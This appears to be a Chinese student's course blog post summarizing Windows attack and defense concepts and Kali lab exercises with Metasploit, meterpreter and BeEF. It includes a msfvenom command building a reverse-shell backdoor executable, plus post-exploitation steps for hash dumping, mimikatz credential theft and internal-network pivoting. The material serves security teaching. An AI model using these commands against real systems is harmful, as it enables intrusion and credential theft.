zoukankan      html  css  js  c++  java
  • 20189315《网络攻防实践》第七周作业

    a.教材第七章作业

    第七章Windouws操作系统安全攻防的内容进行学习。Windouws是目前市场上占统治地位的操作系统,到2010年,已经占据了百分之八十八的市场份额。基本结构分为运行于处理器特权模式的操作系统内核,已经运行在处理器非特权模式的用户空间代码,与UNIX一样,采用宏内核模式来进行架构,这也使得系统更容易遭受Rootkit的危害,为了应对这种攻击,采用数字签名的办法提高安全性。Windows操作系统中,有用户,用户组和计算机三大类,对于每个安全主体,空间和时间上都全局唯一的SID安全标识符来进行标识.对于Windows,远程攻击技术分为:远程口令猜测与破解攻击,攻击Windows网络服务,攻击Windows客户端及用户这三大类。Windows通过基于服务器消息块协议承载的文件与打印共享服务来为网络用户提供远程访问文件系统的和打印机的支持,所以SMB协议也成为了攻击者实施远程口令字猜测的攻击渠道,目前自动执行远程口令字猜测的工具有很多,其中比较流行的包括legin,enum,NTSscan等。攻击者在目标系统上达到自己的需求和目的后,一般还会在系统中植入远程控制系统,维持对这台主机的控制权,比如一些命令行远程控制工具Netcat,或者图形化远程控制工具,其中最著名的是VNC软件。

    Windows操作系统基本框架

    1、windows基本结构分为运行于处理器特权模式的操作系统内核以及运行在处理器非特权模式的用户,即为内核态和用户态。
    2、内核态:windows执行体、windows内核体、设备驱动程序、硬件抽象层、windows窗口与图形界面接口。
    3、用户态:系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。
    4、核心机制:进程和线程管理机制、内存管理机制、文件管理机制、注册表管理机制、网络管理机制。
    5、网络管理机制:网卡硬件驱动程序(物理层)、NDIS库以及miniport驱动程序(链路层)、TDI传输层(网络协议驱动)(网络层和传输层)、网络APID以及TDI客户端(会话层和表示层)、网络应用程序和服务进程(应用层)。

    安全体系结构和机制

    1、监控器模型:主体到客体的访问都通过监控器作中间,由引用监控器根据安全访问控制策略来进行授权访问,所有访问记录都由监控器生成审计日志。
    2、核心:SRM安全引用监控(内核中)、LSASS安全服务(用户态)、winlogon/netlogn、以及Eventlog
    3、身份认证机制:安全主体:用户、用户组、计算机 身份认证:本地身份认证(winlogon进程、GINA图形化登录窗口与LSASS服务)、网络身份认证(NTLM、Lanman、kerberos)
    4、授权与访问控制机制:对象:文件,目录,注册表键值,内核对象,同步对象,私有对象,管道,内存,通信接口。 属性组成:Owner SID,Group SID,DACL自主访问控制列表,SACL系统审计访问控制列表。
    5、安全审计机制
    6、其他安全机制:安全中心(防火墙、补丁自动更新、病毒防护),IPsec加载和验证机制,EPS加密文件系统,windows文件保护机制,捆绑的IE浏览器所提供的隐私保护和浏览器安全保护机制。

    远程安全攻防技术

    1、包括远程口令猜解攻击、windows网络服务攻击,windows客户端和用户攻击。
    2、生命周期:windows安全漏洞发现,利用与修补过程 安全漏洞公开披露信息 CVE,NVD,SecyrityFocus,OSVDB 针对特定目标的渗透测试攻击过程:漏洞扫描测试、查找针对发现漏洞的渗透代码、实施渗透测试 使用metasploit软件实施渗透测试:用户接口(CLI、Console,web,GUI)
    3、远程口令猜解攻击: 远程口令猜解:SMB协议(tcp445、tcp139),其他包括WMI服务、TS远程桌面终端服务,MY SQL数据库服务、SharePoint。工具包括:Legion、enum、smbgrind、NTScan、XScan、流光 远程口令字交换通信窃听与破解:NTLM、Lanman、NTLMV2和kerberos网络认证协议的弱点。 远程口令猜解的防范:关闭不必要的易受攻击的网络服务、配置主机防火墙来限制某些端口服务、网络防火墙限制这些服务的访问、禁用过时且有安全缺陷的Lanman和NTLM、指定强口令策略。
    4、网络服务远程渗透攻击:针对NETBIOS服务的著名漏洞和攻击、针对SMB服务的著名漏洞和攻击、针对MSRPC服务的著名漏洞和攻击、针对windows系统上微软网络的远程渗透攻击、针对windows系统上第三方服务的远程渗透攻击。 防范措施:最基本的是尽量避免与消除这些渗透攻击所依赖的服务软件安全漏洞。

    本地安全攻防技术

    1、本地提权攻击:利用操作系统内核、特权用户启动程序中安全缺陷与漏洞,原因是服务器和桌面系统没有即时进行补丁更新。
    2、敏感信息窃取: windows系统口令密文提取技术(拷贝口令密文文件、rdisk工具备份、pwdumpx从SAM文件或者活动目录中提取口令密文) windows系统口令字破解技术(L0phtCrack、John theRipperCain) 用户敏感数据窃取:find、findstr、grep、meterpreter 本地敏感信息窃取防范:选择高强度、高防御的口令,使用更安全的加密明文算法,安全配置策略。

    windows消灭踪迹

    1、消灭踪迹:关闭审计功能、清理事件日志。 防范措施:事先设置系统审计和网络服务审计,日志记录在不可擦除的CDROM上。
    2、远控和后门程序: 远控:命令行远控工具(Netcat,psexec,meterpreter),图形化远控工具(VNC,RemoteAdmin,PCanyware) 后门程序:国外(BO、BO2K),国内(冰河、灰鸽子、广外女生、PCshare、磁碟机、机器狗等) 防范措施:后门检测软件、杀软、rootkitrerealer、IcSword。

    b.kali视频学习

    1、Kali漏洞利用之检索与利用

    1、searchsploit可以借助关键词搜索漏洞信息以及漏洞对应的exp

    searchsploit wordpress
    

    2、ikat自动化开启不同的exp。等待目标访问中招。

    3、termineter旨在评估智能电表的安全性

    2、Kali 漏洞利用之Metasploit基础

    Metasploit在渗透测试中经常被用到。这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。
    1、启动服务
    在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以利用msf数据库查询exploit和记录。
    2、路径介绍
    Kali中msf的路径为/usr/share/metasploit-framework

    3、msfpayload:用来生成payload或者shellcode。 搜索可以用msfpayload -l |gre[ "windows"查询; -o选项可以列出payload所需的参数。
    msfencode:msf中的编码器,早期用来绕过AV(杀毒软件),现常用msfpayload与它编码避免exploit的坏字符串。
    msfconsole:开启metasploit的console。
    输入msfconsole,打开msf

    4、测试示例:发现漏洞,搜索exploit
    nmap -sV 192.168.1.105
    此版本是否存在漏洞,在msf里用search vsftpd搜索一下

    5、测试示例:选择exploit,查看参数

    进入exploit时发生点小问题,检查之后发现是自己输入错误,改正后正确进入
    查看参数,发现RHOST的参数还未设置,接下来为其设置参数set RHOST 192.168.1.105

    6、测试示例:选择payload

    设置好之后,show options查看参数,发现没有要设置的参数了

    7、执行攻击
    输入exploit即可进行攻击测试,如果成功,将返回一个shell:

    3、Kali漏洞利用之Meterpreter介绍

    Meterpreter是metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后绐我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的—个meterpretershell的链接。
    1、生成meterpreter后门
    选定攻击载荷windows/meterpreter/reverse_tcp(针对windows,反向连接shell),使用

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.161 LPORT=2333 -e x86/shikata_ga_nai -i 5 -f exe -o /root/backdoor.exe
    

    生成后门

    2、监听设置
    生成的后门需要有相应的监听。打开metasploit的console,配置一个反弹会话处理程序:

    3、meterpreter shell
    当目标机器成功执行backdoor.exe后,我们就取得了一个 meterpreter shell 。输入background返回msf,如果想返回meterpreter shell,输入sessions查看ID,输入sessions -i ID选择想返回的会话。

    在meterpreter shell中输入help查看可执行的命令,如sysinfo显示目标系统信息,hashdump抓取哈希,pwd显示当前路径等。

    meterpreter还有一些扩展工具,使用load + tab键查看这些工具,然后选择所需工具进行使用(load mimikatz 用来抓取系统明文)。

    4、Kali漏洞利用之Metasploit后渗透测试

    在跳板获取一定权限后需要积极地向内网主机权限发展,获取指定的目标信息,探查系统漏洞,借助msf已经得到的Meterpreter后门,可以使系列的操作更容易。
    1、查看当前网卡、网段信息(使用ifconfig)。可查看到三个网卡,一个是本地网卡,另一个是我们能访问的网卡,还有一个网卡具有内网IP(访问不到,可以ping以下试试)。
    2、添加路由表run autoroute -s 10.0.0.1可以使用msf中的模块跨网段攻击或扫描。可通过脚本autoroute快速添加。
    3、开socket代理,通过使用auxiliary/server/socks4a模块,创建一个socks代理,可以为浏览器,sqlmap,nmap使用。通过代理即可访问内网计算机。
    4、通过background和session -i可以自由切换进入session。
    5、输入run可以看到在meterpreter上可以做的很多命令。
    6、通过run post/可以看到后渗透测试模块。
    7、获取内网信息run arp_scanner -r 10.0.0.1/24
    8、也可以上传文件,做端口转发后进行后续测试,例如upload lcx.exe c:传送文件到c盘根目录。

    5、Kali漏洞利用之BeEF

    对XSS漏洞往往需要一个强大的框架支持,如网络上的XSS平台,在KALI下,BeEf是一款丝毫不逊于XSS平台的工具。BeEf是浏览器攻击框架的简称,是一款专注于浏览器的渗透测试工具,它扩展了跨站漏洞的利用,能hook很多浏览器并可以执行很多内嵌命令。
    1、命令行输入beef-xss,浏览器自动访问页面


    2、假设被测试主机由于XSS漏洞请求到http://127.0.0.1:3000/demos/basic.html

    此时页面左侧就会多出一项在线主机:

    3、HOOK持续的时间为测试页面时间为止,在此期间,相当于被控制了,可以发送攻击命令,在Command模块,可以完成许多功能。

    4、选区MISC下的Raw JavaScript模块作为测试用例,输入“hello world!”,点击excute进行攻击。

    5、Proxy功能(代理功能)
    选中目标主机,点右键,在菜单中选中Use as Proxy;然后在Rider选项卡中的Forge Request编辑并发送想要发送的内容。

    6、BeEF默认是不加载Metasploit的,如果要使用Metasploit丰富的攻击模块,需要做些配置.
    配置:首先打开beef-xss目录:

    将Metasploit的false修改为true:

    保证此处IP等信息设置正确(不适用127.0.0.1,需使用本机IP),并修改Custom路径:

    将host和callback_host行的IP修改为本机IP,并修改custom路径为/usr/share/metasploit-framework/
    配置好后打开msfconsole,运行命令:

    执行./beef -x
    重新加载Metasploit的exploit模块:

    加载之后,重启下服务:service beef-xss restart
    此时再访问以下之前的页面,发现无法连接,稍等片刻,使用默认用户密码登录进去。发现Metasploit下多了许多模块。

  • 相关阅读:
    ElasticSearch记录(1)底层原理
    hbase学习记录(4)hbase和Hadoop整合(实现wrodcount程序)
    flume记录(2)监控文件和目录,对hdfs操作
    flume记录(1)使用
    hbase学习记录(3)JAVA_API操作hbase
    hbase学习记录(2)shell常用命令
    hbase学习记录(1)简介
    ssh三大框架整合
    spring事务管理
    Ubuntu 18.04版本设置root账户
  • 原文地址:https://www.cnblogs.com/zhao-chen-xi/p/10698895.html
Copyright © 2011-2022 走看看